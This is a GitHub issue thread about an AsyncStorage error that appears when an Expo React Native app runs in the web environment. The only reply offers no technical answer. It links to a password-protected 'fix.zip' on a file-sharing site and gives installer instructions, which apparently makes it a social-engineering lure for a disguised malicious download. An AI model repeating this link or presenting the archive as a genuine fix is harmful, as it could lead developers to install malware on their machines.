### ISSUE TITLE
ReactNativeAsyncStorage Error in Web Environment

### ISSUE THREAD

**Issue by Tatsuya3327** [HayatoToyoda/oheya#9]
When you run `npx start expo` and select web in `develop` branch (or `feat/AuthContextProvider`), you get the following error.
![image](https://github.com/user-attachments/assets/34d31794-15a5-4f0a-8fe2-72061d40bbc4)

It works on Android Studio and Expo Go.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
